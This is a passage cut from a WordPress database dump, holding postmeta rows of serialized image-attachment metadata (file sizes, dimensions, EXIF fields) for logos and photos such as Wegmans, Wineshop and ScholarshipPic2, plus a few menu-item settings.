:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Wegmans-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"Wegmans-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:19:\"Wegmans-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:19:\"Wegmans-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"Wegmans-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"Wegmans-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"Wegmans-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"Wegmans-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3619,918,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:19:\"2017/01/CWLogo2.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"CWLogo2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"CWLogo2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:19:\"CWLogo2-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:19:\"CWLogo2-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"CWLogo2-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"CWLogo2-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"CWLogo2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3620,919,'_wp_attached_file','2017/01/Photobuzz-1.png'),(3621,919,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:23:\"2017/01/Photobuzz-1.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"Photobuzz-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Photobuzz-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:23:\"Photobuzz-1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:23:\"Photobuzz-1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:23:\"Photobuzz-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"Photobuzz-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"Photobuzz-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3622,920,'_wp_attached_file','2017/01/JS-1.png'),(3623,920,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:16:\"2017/01/JS-1.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"JS-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"JS-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:16:\"JS-1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:16:\"JS-1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:16:\"JS-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:16:\"JS-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:16:\"JS-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3624,921,'_wp_attached_file','2017/01/Wegmans-1.png'),(3625,921,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:21:\"2017/01/Wegmans-1.png\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Wegmans-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Wegmans-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Wegmans-1-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Wegmans-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:21:\"Wegmans-1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:21:\"Wegmans-1-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"Wegmans-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"Wegmans-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"Wegmans-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"Wegmans-1-600x600.png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3626,922,'_wp_attached_file','2017/01/Wegmans2.png'),(3627,922,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:20:\"2017/01/Wegmans2.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Wegmans2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"Wegmans2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"Wegmans2-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"Wegmans2-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"Wegmans2-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"Wegmans2-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"Wegmans2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3628,923,'_wp_attached_file','2017/01/Wineshop-1.png'),(3629,923,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:22:\"2017/01/Wineshop-1.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Wineshop-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Wineshop-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"Wineshop-1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:22:\"Wineshop-1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"Wineshop-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"Wineshop-1-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"Wineshop-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3690,933,'_wp_attached_file','2014/12/Membership.png'),(3691,933,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2829;s:6:\"height\";i:1591;s:4:\"file\";s:22:\"2014/12/Membership.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Membership-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Membership-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Membership-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Membership-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Membership-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"Membership-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:22:\"Membership-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"Membership-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3692,934,'_wp_attached_file','2014/12/ServingHC.png'),(3693,934,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:555;s:4:\"file\";s:21:\"2014/12/ServingHC.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"ServingHC-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"ServingHC-270x300.png\";s:5:\"width\";i:270;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"ServingHC-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:21:\"ServingHC-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:21:\"ServingHC-500x300.png\";s:5:\"width\";i:500;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:21:\"ServingHC-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3697,936,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3456;s:6:\"height\";i:5184;s:4:\"file\";s:35:\"2017/01/IMG_0845-e1484547852506.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0845-e1484547852506-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"IMG_0845-e1484547852506-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"IMG_0845-e1484547852506-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"IMG_0845-e1484547852506-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:35:\"IMG_0845-e1484547852506-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:35:\"IMG_0845-e1484547852506-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:35:\"IMG_0845-e1484547852506-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:35:\"IMG_0845-e1484547852506-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:19:\"Canon EOS REBEL T3i\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476644985\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"34\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"8\";s:8:\"keywords\";a:0:{}}}'),(3698,936,'_wp_attachment_backup_sizes','a:9:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:5184;s:6:\"height\";i:3456;s:4:\"file\";s:12:\"IMG_0845.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0845-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0845-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0845-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:21:\"IMG_0845-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0845-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0845-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0845-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0845-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(3700,937,'_wp_attached_file','2017/01/img_0845-1.jpg'),(3701,937,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2892;s:6:\"height\";i:2818;s:4:\"file\";s:22:\"2017/01/img_0845-1.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"img_0845-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"img_0845-1-300x292.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:292;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"img_0845-1-768x748.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:748;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"img_0845-1-1024x998.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:998;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"img_0845-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:22:\"img_0845-1-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:22:\"img_0845-1-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:22:\"img_0845-1-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:19:\"Canon EOS REBEL T3i\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1476644985\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"34\";s:3:\"iso\";s:4:\"1600\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(3707,939,'_wp_attached_file','2017/01/FinalZENLogo.png'),(3708,939,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:103;s:6:\"height\";i:108;s:4:\"file\";s:24:\"2017/01/FinalZENLogo.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3709,940,'_wp_attached_file','2017/01/FinalZENLogo.jpg'),(3710,940,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:103;s:6:\"height\";i:109;s:4:\"file\";s:24:\"2017/01/FinalZENLogo.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3850,966,'_wp_attached_file','2017/01/ScholarshipPic2.jpg'),(3851,966,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:640;s:4:\"file\";s:27:\"2017/01/ScholarshipPic2.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic2-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic2-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic2-640x300.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"ScholarshipPic2-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3794,956,'ts_article_views','2138'),(3737,949,'_menu_item_type','post_type'),(3738,949,'_menu_item_menu_item_parent','0'),(3739,949,'_menu_item_object_id','190'),(3740,949,'_menu_item_object','page'),(3741,949,'_menu_item_target',''),